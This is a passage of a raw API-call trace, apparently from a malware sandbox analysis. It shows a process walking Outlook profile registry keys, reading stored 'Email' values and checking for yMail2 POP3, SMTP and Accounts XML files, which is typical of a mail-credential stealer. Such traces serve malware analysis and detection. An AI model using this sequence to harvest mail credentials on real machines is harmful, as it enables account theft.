[0130.004] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa90 [0130.005] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0130.005] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", phkResult=0x6baa90 | out: phkResult=0x6baa90*=0x22c) returned 0x0 [0130.005] GetProcessHeap () returned 0x6a0000 [0130.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bc078 [0130.006] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0130.007] SHEnumKeyExW (in: hkey=0x22c, dwIndex=0x0, pszName=0x6bc078, pcchName=0x19fb1c | out: pszName="", pcchName=0x19fb1c) returned 0x103 [0130.007] GetProcessHeap () returned 0x6a0000 [0130.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc078 | out: hHeap=0x6a0000) returned 1 [0130.008] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0130.008] RegCloseKey (hKey=0x22c) returned 0x0 [0130.008] GetProcessHeap () returned 0x6a0000 [0130.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa90 | out: hHeap=0x6a0000) returned 1 [0130.008] GetProcessHeap () returned 0x6a0000 [0130.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ae170 | out: hHeap=0x6a0000) returned 1 [0130.009] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0130.010] RegCloseKey (hKey=0x21c) returned 0x0 [0130.010] GetProcessHeap () returned 0x6a0000 [0130.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0130.011] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0130.011] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x2, pszName=0x6bbc60, pcchName=0x19fb4c | out: pszName="00000003", pcchName=0x19fb4c) returned 0x0 [0130.011] GetProcessHeap () returned 0x6a0000 [0130.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa50 [0130.012] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0130.013] RegOpenKeyW (in: hKey=0x204, lpSubKey="00000003", phkResult=0x6baa50 | out: phkResult=0x6baa50*=0x21c) returned 0x0 [0130.013] GetProcessHeap () returned 0x6a0000 [0130.013] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bc078 [0130.014] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0130.014] SHQueryValueExW (in: hkey=0x21c, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x6bc078, pcbData=0x19f6c0*=0x208 | out: pdwType=0x0, pvData=0x6bc078, pcbData=0x19f6c0*=0x208) returned 0x2 [0130.014] GetProcessHeap () returned 0x6a0000 [0130.014] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc078 | out: hHeap=0x6a0000) returned 1 [0130.015] GetProcessHeap () returned 0x6a0000 [0130.015] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f4a) returned 0x6bc960 [0130.015] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0130.016] wvsprintfW (in: param_1=0x6bc960, param_2="%s\\%s", arglist=0x19fb30 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003") returned 97 [0130.016] GetProcessHeap () returned 0x6a0000 [0130.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc6) returned 0x6ae990 [0130.016] GetProcessHeap () returned 0x6a0000 [0130.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc960 | out: hHeap=0x6a0000) returned 1 [0130.016] GetProcessHeap () returned 0x6a0000 [0130.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0130.018] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0130.018] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", phkResult=0x6bab40 | out: phkResult=0x6bab40*=0x22c) returned 0x0 [0130.018] GetProcessHeap () returned 0x6a0000 [0130.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bc078 [0130.019] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0130.019] SHEnumKeyExW (in: hkey=0x22c, dwIndex=0x0, pszName=0x6bc078, pcchName=0x19fb1c | out: pszName="", pcchName=0x19fb1c) returned 0x103 [0130.019] GetProcessHeap () returned 0x6a0000 [0130.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc078 | out: hHeap=0x6a0000) returned 1 [0130.021] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0130.021] RegCloseKey (hKey=0x22c) returned 0x0 [0130.021] GetProcessHeap () returned 0x6a0000 [0130.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0130.021] GetProcessHeap () returned 0x6a0000 [0130.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ae990 | out: hHeap=0x6a0000) returned 1 [0130.022] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0130.023] RegCloseKey (hKey=0x21c) returned 0x0 [0130.023] GetProcessHeap () returned 0x6a0000 [0130.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa50 | out: hHeap=0x6a0000) returned 1 [0130.024] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0130.024] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x3, pszName=0x6bbc60, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0130.024] GetProcessHeap () returned 0x6a0000 [0130.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0130.025] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0130.026] RegCloseKey (hKey=0x204) returned 0x0 [0130.026] GetProcessHeap () returned 0x6a0000 [0130.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaa0 | out: hHeap=0x6a0000) returned 1 [0130.026] GetProcessHeap () returned 0x6a0000 [0130.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0130.031] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0130.032] RegCloseKey (hKey=0x210) returned 0x0 [0130.032] GetProcessHeap () returned 0x6a0000 [0130.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab10 | out: hHeap=0x6a0000) returned 1 [0130.032] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0130.033] SHEnumKeyExW (in: hkey=0x218, dwIndex=0xa, pszName=0x6bb848, pcchName=0x19fb7c | out: pszName="dc48e7c6d33441458035ee20beefe18a", pcchName=0x19fb7c) returned 0x0 [0130.033] GetProcessHeap () returned 0x6a0000 [0130.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa80 [0130.033] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0130.034] RegOpenKeyW (in: hKey=0x218, lpSubKey="dc48e7c6d33441458035ee20beefe18a", phkResult=0x6baa80 | out: phkResult=0x6baa80*=0x210) returned 0x0 [0130.034] GetProcessHeap () returned 0x6a0000 [0130.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bbc60 [0130.035] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0130.035] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x6bbc60, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x6bbc60, pcbData=0x19f6f0*=0x208) returned 0x2 [0130.035] GetProcessHeap () returned 0x6a0000 [0130.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0130.036] GetProcessHeap () returned 0x6a0000 [0130.036] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f4a) returned 0x6bc960 [0130.037] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0130.039] wvsprintfW (in: param_1=0x6bc960, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc48e7c6d33441458035ee20beefe18a") returned 88 [0130.039] GetProcessHeap () returned 0x6a0000 [0130.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb4) returned 0x6bac30 [0130.039] GetProcessHeap () returned 0x6a0000 [0130.040] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc960 | out: hHeap=0x6a0000) returned 1 [0130.040] GetProcessHeap () returned 0x6a0000 [0130.040] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa70 [0130.041] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0130.042] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc48e7c6d33441458035ee20beefe18a", phkResult=0x6baa70 | out: phkResult=0x6baa70*=0x204) returned 0x0 [0130.042] GetProcessHeap () returned 0x6a0000 [0130.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bbc60 [0130.043] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0130.044] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x6bbc60, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0130.044] GetProcessHeap () returned 0x6a0000 [0130.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0130.045] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0130.046] RegCloseKey (hKey=0x204) returned 0x0 [0130.046] GetProcessHeap () returned 0x6a0000 [0130.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa70 | out: hHeap=0x6a0000) returned 1 [0130.046] GetProcessHeap () returned 0x6a0000 [0130.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0130.049] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0130.050] RegCloseKey (hKey=0x210) returned 0x0 [0130.050] GetProcessHeap () returned 0x6a0000 [0130.050] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa80 | out: hHeap=0x6a0000) returned 1 [0130.051] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0130.051] SHEnumKeyExW (in: hkey=0x218, dwIndex=0xb, pszName=0x6bb848, pcchName=0x19fb7c | out: pszName="e57f6d0b27b6134693ca7113a4ab34a6", pcchName=0x19fb7c) returned 0x0 [0130.051] GetProcessHeap () returned 0x6a0000 [0130.051] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9a0 [0130.052] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0130.053] RegOpenKeyW (in: hKey=0x218, lpSubKey="e57f6d0b27b6134693ca7113a4ab34a6", phkResult=0x6ba9a0 | out: phkResult=0x6ba9a0*=0x210) returned 0x0 [0130.053] GetProcessHeap () returned 0x6a0000 [0130.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bbc60 [0130.054] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0130.054] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x6bbc60, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x6bbc60, pcbData=0x19f6f0*=0x208) returned 0x2 [0130.054] GetProcessHeap () returned 0x6a0000 [0130.055] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0130.055] GetProcessHeap () returned 0x6a0000 [0130.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f4a) returned 0x6bc960 [0130.056] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0130.056] wvsprintfW (in: param_1=0x6bc960, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\e57f6d0b27b6134693ca7113a4ab34a6") returned 88 [0130.056] GetProcessHeap () returned 0x6a0000 [0130.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb4) returned 0x6bac30 [0130.056] GetProcessHeap () returned 0x6a0000 [0130.057] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc960 | out: hHeap=0x6a0000) returned 1 [0130.057] GetProcessHeap () returned 0x6a0000 [0130.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa50 [0130.058] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0130.058] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\e57f6d0b27b6134693ca7113a4ab34a6", phkResult=0x6baa50 | out: phkResult=0x6baa50*=0x204) returned 0x0 [0130.059] GetProcessHeap () returned 0x6a0000 [0130.059] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bbc60 [0130.059] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0130.059] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x6bbc60, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0130.060] GetProcessHeap () returned 0x6a0000 [0130.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0130.061] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0130.061] RegCloseKey (hKey=0x204) returned 0x0 [0130.061] GetProcessHeap () returned 0x6a0000 [0130.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa50 | out: hHeap=0x6a0000) returned 1 [0130.061] GetProcessHeap () returned 0x6a0000 [0130.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0130.062] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0130.063] RegCloseKey (hKey=0x210) returned 0x0 [0130.063] GetProcessHeap () returned 0x6a0000 [0130.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9a0 | out: hHeap=0x6a0000) returned 1 [0130.064] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0130.064] SHEnumKeyExW (in: hkey=0x218, dwIndex=0xc, pszName=0x6bb848, pcchName=0x19fb7c | out: pszName="f35c115766b7c94cb080da6869ae8f9d", pcchName=0x19fb7c) returned 0x0 [0130.064] GetProcessHeap () returned 0x6a0000 [0130.064] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa80 [0130.065] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0130.066] RegOpenKeyW (in: hKey=0x218, lpSubKey="f35c115766b7c94cb080da6869ae8f9d", phkResult=0x6baa80 | out: phkResult=0x6baa80*=0x210) returned 0x0 [0130.066] GetProcessHeap () returned 0x6a0000 [0130.066] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bbc60 [0130.066] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0130.067] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x6bbc60, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x6bbc60, pcbData=0x19f6f0*=0x208) returned 0x2 [0130.067] GetProcessHeap () returned 0x6a0000 [0130.067] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0130.067] GetProcessHeap () returned 0x6a0000 [0130.067] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f4a) returned 0x6bc960 [0130.069] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0130.078] wvsprintfW (in: param_1=0x6bc960, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f35c115766b7c94cb080da6869ae8f9d") returned 88 [0130.078] GetProcessHeap () returned 0x6a0000 [0130.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb4) returned 0x6bac30 [0130.078] GetProcessHeap () returned 0x6a0000 [0130.078] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc960 | out: hHeap=0x6a0000) returned 1 [0130.079] GetProcessHeap () returned 0x6a0000 [0130.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9a0 [0130.080] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0130.080] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f35c115766b7c94cb080da6869ae8f9d", phkResult=0x6ba9a0 | out: phkResult=0x6ba9a0*=0x204) returned 0x0 [0130.080] GetProcessHeap () returned 0x6a0000 [0130.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bbc60 [0130.081] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0130.082] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x6bbc60, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0130.082] GetProcessHeap () returned 0x6a0000 [0130.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0130.093] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0130.094] RegCloseKey (hKey=0x204) returned 0x0 [0130.094] GetProcessHeap () returned 0x6a0000 [0130.094] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9a0 | out: hHeap=0x6a0000) returned 1 [0130.094] GetProcessHeap () returned 0x6a0000 [0130.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0130.096] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0130.097] RegCloseKey (hKey=0x210) returned 0x0 [0130.097] GetProcessHeap () returned 0x6a0000 [0130.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa80 | out: hHeap=0x6a0000) returned 1 [0130.098] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0130.098] SHEnumKeyExW (in: hkey=0x218, dwIndex=0xd, pszName=0x6bb848, pcchName=0x19fb7c | out: pszName="f86ed2903a4a11cfb57e524153480001", pcchName=0x19fb7c) returned 0x0 [0130.099] GetProcessHeap () returned 0x6a0000 [0130.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab10 [0130.100] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0130.100] RegOpenKeyW (in: hKey=0x218, lpSubKey="f86ed2903a4a11cfb57e524153480001", phkResult=0x6bab10 | out: phkResult=0x6bab10*=0x210) returned 0x0 [0130.101] GetProcessHeap () returned 0x6a0000 [0130.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bbc60 [0130.102] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0130.102] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x6bbc60, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x6bbc60, pcbData=0x19f6f0*=0x208) returned 0x2 [0130.102] GetProcessHeap () returned 0x6a0000 [0130.103] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0130.103] GetProcessHeap () returned 0x6a0000 [0130.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f4a) returned 0x6bc960 [0130.104] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0130.105] wvsprintfW (in: param_1=0x6bc960, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001") returned 88 [0130.105] GetProcessHeap () returned 0x6a0000 [0130.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb4) returned 0x6bac30 [0130.105] GetProcessHeap () returned 0x6a0000 [0130.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc960 | out: hHeap=0x6a0000) returned 1 [0130.106] GetProcessHeap () returned 0x6a0000 [0130.106] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa40 [0130.107] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0130.107] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", phkResult=0x6baa40 | out: phkResult=0x6baa40*=0x204) returned 0x0 [0130.107] GetProcessHeap () returned 0x6a0000 [0130.107] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bbc60 [0130.108] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0130.109] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x6bbc60, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0130.109] GetProcessHeap () returned 0x6a0000 [0130.109] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0130.110] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0130.111] RegCloseKey (hKey=0x204) returned 0x0 [0130.111] GetProcessHeap () returned 0x6a0000 [0130.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa40 | out: hHeap=0x6a0000) returned 1 [0130.111] GetProcessHeap () returned 0x6a0000 [0130.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0130.112] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0130.113] RegCloseKey (hKey=0x210) returned 0x0 [0130.113] GetProcessHeap () returned 0x6a0000 [0130.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab10 | out: hHeap=0x6a0000) returned 1 [0130.114] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0130.115] SHEnumKeyExW (in: hkey=0x218, dwIndex=0xe, pszName=0x6bb848, pcchName=0x19fb7c | out: pszName="", pcchName=0x19fb7c) returned 0x103 [0130.115] GetProcessHeap () returned 0x6a0000 [0130.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb848 | out: hHeap=0x6a0000) returned 1 [0130.116] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0130.117] RegCloseKey (hKey=0x218) returned 0x0 [0130.117] GetProcessHeap () returned 0x6a0000 [0130.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baad0 | out: hHeap=0x6a0000) returned 1 [0130.117] GetProcessHeap () returned 0x6a0000 [0130.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0130.117] GetProcessHeap () returned 0x6a0000 [0130.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ab4f0 | out: hHeap=0x6a0000) returned 1 [0130.117] GetProcessHeap () returned 0x6a0000 [0130.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bae98 [0130.118] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0130.119] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x6bae98 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0130.119] GetProcessHeap () returned 0x6a0000 [0130.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f64) returned 0x6bc960 [0130.120] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0130.121] wvsprintfW (in: param_1=0x6bc960, param_2="%s\\yMail2\\POP3.xml", arglist=0x19fae8 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail2\\POP3.xml") returned 47 [0130.121] GetProcessHeap () returned 0x6a0000 [0130.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x62) returned 0x6bb0a8 [0130.121] GetProcessHeap () returned 0x6a0000 [0130.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc960 | out: hHeap=0x6a0000) returned 1 [0130.122] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0130.122] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail2\\POP3.xml") returned 0 [0130.123] GetProcessHeap () returned 0x6a0000 [0130.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb0a8 | out: hHeap=0x6a0000) returned 1 [0130.123] GetProcessHeap () returned 0x6a0000 [0130.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bae98 | out: hHeap=0x6a0000) returned 1 [0130.124] GetProcessHeap () returned 0x6a0000 [0130.124] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bae98 [0130.127] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0130.127] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x6bae98 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0130.127] GetProcessHeap () returned 0x6a0000 [0130.127] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f64) returned 0x6bc960 [0130.128] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0130.129] wvsprintfW (in: param_1=0x6bc960, param_2="%s\\yMail2\\SMTP.xml", arglist=0x19fadc | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail2\\SMTP.xml") returned 47 [0130.129] GetProcessHeap () returned 0x6a0000 [0130.129] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x62) returned 0x6bb0a8 [0130.129] GetProcessHeap () returned 0x6a0000 [0130.130] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc960 | out: hHeap=0x6a0000) returned 1 [0130.131] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0130.131] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail2\\SMTP.xml") returned 0 [0130.131] GetProcessHeap () returned 0x6a0000 [0130.131] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb0a8 | out: hHeap=0x6a0000) returned 1 [0130.132] GetProcessHeap () returned 0x6a0000 [0130.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bae98 | out: hHeap=0x6a0000) returned 1 [0130.132] GetProcessHeap () returned 0x6a0000 [0130.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bae98 [0130.133] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0130.133] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x6bae98 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0130.134] GetProcessHeap () returned 0x6a0000 [0130.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f6c) returned 0x6bc960 [0130.134] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0130.135] wvsprintfW (in: param_1=0x6bc960, param_2="%s\\yMail2\\Accounts.xml", arglist=0x19fad0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail2\\Accounts.xml") returned 51 [0130.135] GetProcessHeap () returned 0x6a0000 [0130.135] RtlAllocateHeap (HeapHandle=0x6a0000, 